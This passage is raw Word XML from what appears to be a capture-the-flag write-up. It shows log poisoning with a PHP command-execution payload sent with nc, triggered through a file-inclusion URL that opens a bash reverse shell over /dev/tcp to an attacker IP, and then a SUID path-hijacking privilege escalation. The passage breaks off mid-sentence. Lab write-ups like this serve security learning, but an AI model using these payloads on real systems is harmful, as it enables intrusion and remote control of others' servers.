      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to inject </w:t>
      </w:r>
      <w:r w:rsidR="71E483DE" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="71E483DE" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="71E483DE" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload</w:t>
      </w:r>
      <w:r w:rsidR="40D30CF9" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="55BB2817" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in /var/log/auth.log</w:t>
      </w:r>
      <w:r w:rsidR="784A94C7" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE7C130" w14:textId="734B4EED" w:rsidR="003A6B4D" w:rsidRDefault="003A6B4D" w:rsidP="24730F8F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47F4BC86" w14:textId="3876B7DC" w:rsidR="003A6B4D" w:rsidRDefault="784A94C7" w:rsidP="00AD0E4F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>echo '&lt;?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> system($_GET["</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"])</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; ?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;' | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.81.180.174 22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF90CC1" w14:textId="263C2628" w:rsidR="24730F8F" w:rsidRDefault="24730F8F" w:rsidP="24730F8F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EE5E61F" w14:textId="5A0C4911" w:rsidR="00B17D2E" w:rsidRDefault="0067D5D2" w:rsidP="52E3155C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>And triggered the payload by visiting:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9B60FB" w14:textId="5872AE21" w:rsidR="24730F8F" w:rsidRDefault="24730F8F" w:rsidP="24730F8F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E7D4A23" w14:textId="3CB56D9D" w:rsidR="00B17D2E" w:rsidRDefault="0067D5D2" w:rsidP="00AD0E4F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://</w:t>
      </w:r>
      <w:r w:rsidR="0B22AB95" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>10.81.180.174</w:t>
      </w:r>
      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/blog-post/archives/randylogs.php?file=/var/log/auth.log&amp;cmd=bash -c "bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;%26 /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/10.8</w:t>
      </w:r>
      <w:r w:rsidR="2D3A9998" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="5BE435E4" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="6FE6884A" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5/4</w:t>
      </w:r>
      <w:r w:rsidR="3004A837" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>321</w:t>
      </w:r>
      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0&gt;%261"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC5537E" w14:textId="48AE99F5" w:rsidR="52E3155C" w:rsidRDefault="52E3155C" w:rsidP="52E3155C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BB18060" w14:textId="6869DBB4" w:rsidR="004B641B" w:rsidRDefault="0599DAEF" w:rsidP="00AD0E4F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This successfully executed the command on the server and sent a connection back to </w:t>
      </w:r>
      <w:r w:rsidR="2CA9CB68" w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> listener:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E684363" w14:textId="44F31D65" w:rsidR="52E3155C" w:rsidRDefault="52E3155C" w:rsidP="52E3155C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="230A6EFB" w14:textId="22A5AFF4" w:rsidR="00A875ED" w:rsidRDefault="515263E6" w:rsidP="00A875ED">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="193D5DD7" wp14:editId="0FD3D143">
            <wp:extent cx="5731510" cy="924560"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="11942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5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9B87" w14:textId="77777777" w:rsidR="007F5667" w:rsidRPr="00A875ED" w:rsidRDefault="007F5667" w:rsidP="00A875ED">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73B5881C" w14:textId="4FE988C7" w:rsidR="007B3B34" w:rsidRPr="007F5667" w:rsidRDefault="313A67DE" w:rsidP="52E3155C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5667">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>We now have access to the server as user: www-data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23269E34" w14:textId="594069FE" w:rsidR="007B3B34" w:rsidRPr="007F5667" w:rsidRDefault="00702786" w:rsidP="52E3155C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5667">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="61308D50" w14:textId="2A27378B" w:rsidR="007B3B34" w:rsidRPr="00F71CAB" w:rsidRDefault="4B444F3B" w:rsidP="00C6772B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc53411617"/>
      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>User accounts</w:t>
      </w:r>
      <w:r w:rsidR="091BD926" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp; Flag</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="64679FB8" w14:textId="153717B3" w:rsidR="00641053" w:rsidRPr="007F5667" w:rsidRDefault="377FDE44" w:rsidP="00641053">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5667">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>By using “</w:t>
      </w:r>
      <w:r w:rsidRPr="007F5667">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:r w:rsidRPr="007F5667">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>” in the home directory we can see that randy has an account, and in his home directory we can find the flag</w:t>
      </w:r>
      <w:r w:rsidR="6C4E3496" w:rsidRPr="007F5667">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77744098" w14:textId="64A2C939" w:rsidR="52E3155C" w:rsidRPr="007F5667" w:rsidRDefault="52E3155C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="070B8C77" w14:textId="42A960A9" w:rsidR="00641053" w:rsidRPr="00F71CAB" w:rsidRDefault="71983DBC" w:rsidP="00641053">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A6011F0" wp14:editId="73A87FF4">
            <wp:extent cx="5731510" cy="462915"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="18419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3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DCC9" w14:textId="77777777" w:rsidR="00826015" w:rsidRPr="00F71CAB" w:rsidRDefault="4B444F3B" w:rsidP="00C6772B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc1962124396"/>
      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t>Privilege escalation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="5A8D604E" w14:textId="7A110FDE" w:rsidR="00641053" w:rsidRPr="00222E5C" w:rsidRDefault="33FCB379" w:rsidP="24730F8F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc267943449"/>
      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Commands user can run as root</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="5F043314" w14:textId="23371970" w:rsidR="00FF21FF" w:rsidRDefault="00753DBA" w:rsidP="00641053">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E4AC1">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ls -la /home/randy/tools/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00461FD8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">showed </w:t>
      </w:r>
      <w:r w:rsidR="00D72A35" w:rsidRPr="00C212FF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D72A35" w:rsidRPr="00C212FF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rw</w:t>
      </w:r>
      <w:r w:rsidR="00C601B6">
        <w:rPr>
          <w:color w:val="EE0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00D72A35" w:rsidRPr="00C212FF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AC72DC" w:rsidRPr="00C212FF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidR="00C601B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00C212FF" w:rsidRPr="00C212FF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00C212FF" w:rsidRPr="00C212FF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>success</w:t>
      </w:r>
      <w:r w:rsidR="00584A5A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
      <w:r w:rsidR="00C212FF" w:rsidRPr="00C212FF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00C212FF" w:rsidRPr="00C212FF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00C212FF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C212FF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00A520E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0094319B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>easysysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1E662FD1" w14:textId="77777777" w:rsidR="001F5870" w:rsidRPr="00C212FF" w:rsidRDefault="001F5870" w:rsidP="00641053">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E75B07C" w14:textId="22DE1983" w:rsidR="00641053" w:rsidRDefault="00FF21FF" w:rsidP="00641053">
      <w:r w:rsidRPr="00FF21FF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D8588B6" wp14:editId="0184D380">
            <wp:extent cx="5731510" cy="1078230"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="2210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9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0D3E" w14:textId="77777777" w:rsidR="007F5667" w:rsidRDefault="007F5667" w:rsidP="00641053"/>
    <w:p w14:paraId="27730BE0" w14:textId="3516D1F1" w:rsidR="001F5870" w:rsidRPr="00F71CAB" w:rsidRDefault="35D1361D" w:rsidP="52E3155C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>From this we see that randy can run /home/randy/tools/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>easysysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> as root!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113AD174" w14:textId="4D0E909D" w:rsidR="52E3155C" w:rsidRDefault="52E3155C" w:rsidP="52E3155C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="419FDF53" w14:textId="2ED3B409" w:rsidR="00641053" w:rsidRDefault="33FCB379" w:rsidP="24730F8F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc675312950"/>
      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t>Flag</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="0960230E" w14:textId="7B1B339C" w:rsidR="001B2165" w:rsidRDefault="001B2165" w:rsidP="001B2165">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>After some experimenting</w:t>
      </w:r>
      <w:r w:rsidR="00F6439C" w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, using</w:t>
      </w:r>
      <w:r w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> a command like tree w</w:t>
      </w:r>
      <w:r w:rsidR="2356CE7F" w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ich isn’t </w:t>
      </w:r>
      <w:r w:rsidR="6EADF25B" w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>installed,</w:t>
      </w:r>
      <w:r w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> we got this error exposing </w:t>
      </w:r>
      <w:r w:rsidR="11E6958D" w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">that </w:t>
      </w:r>
      <w:r w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>it checks the /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> folder</w:t>
      </w:r>
      <w:r w:rsidR="00BE0E01" w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> before checking the standard system paths</w:t>
      </w:r>
      <w:r w:rsidR="001A0EEE" w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4115613C" w14:textId="77777777" w:rsidR="00CC7A40" w:rsidRPr="00BE0E01" w:rsidRDefault="00CC7A40" w:rsidP="001B2165">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EDBA77E" w14:textId="7F92D82E" w:rsidR="001437B4" w:rsidRDefault="001B2165" w:rsidP="00641053">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="139BCE51" wp14:editId="1E26080C">
            <wp:extent cx="5731510" cy="1459230"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="12721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8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8D0B" w14:textId="77777777" w:rsidR="001437B4" w:rsidRDefault="001437B4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="106FFA37" w14:textId="34948B32" w:rsidR="001F5870" w:rsidRDefault="2DDF6716" w:rsidP="00641053">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>So,</w:t>
      </w:r>
      <w:r w:rsidR="00EA44DA" w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> we have a</w:t>
      </w:r>
      <w:r w:rsidR="00F578A9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> python</w:t>
      </w:r>
      <w:r w:rsidR="00692EBE" w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> program us</w:t>
      </w:r>
      <w:r w:rsidR="00EA44DA" w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="00692EBE" w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00692EBE" w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>os.system</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00692EBE" w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(), which runs commands in a shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D252CA8" w14:textId="6351402F" w:rsidR="52E3155C" w:rsidRDefault="52E3155C" w:rsidP="52E3155C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F116D81" w14:textId="77777777" w:rsidR="008D7686" w:rsidRDefault="00060152" w:rsidP="00641053">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0027778B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F5A1CFA" wp14:editId="0F16686F">
            <wp:extent cx="4039164" cy="3886742"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14370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50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8B92" w14:textId="1BCA71F0" w:rsidR="001F5870" w:rsidRDefault="001F5870" w:rsidP="00641053">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="686589AA" w14:textId="77C6EC8F" w:rsidR="006248E9" w:rsidRDefault="00692EBE" w:rsidP="00641053">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This allowed </w:t>
      </w:r>
      <w:r w:rsidR="0097592D" w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>path</w:t>
      </w:r>
      <w:r w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="3F236DC9" w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hijacking,</w:t>
      </w:r>
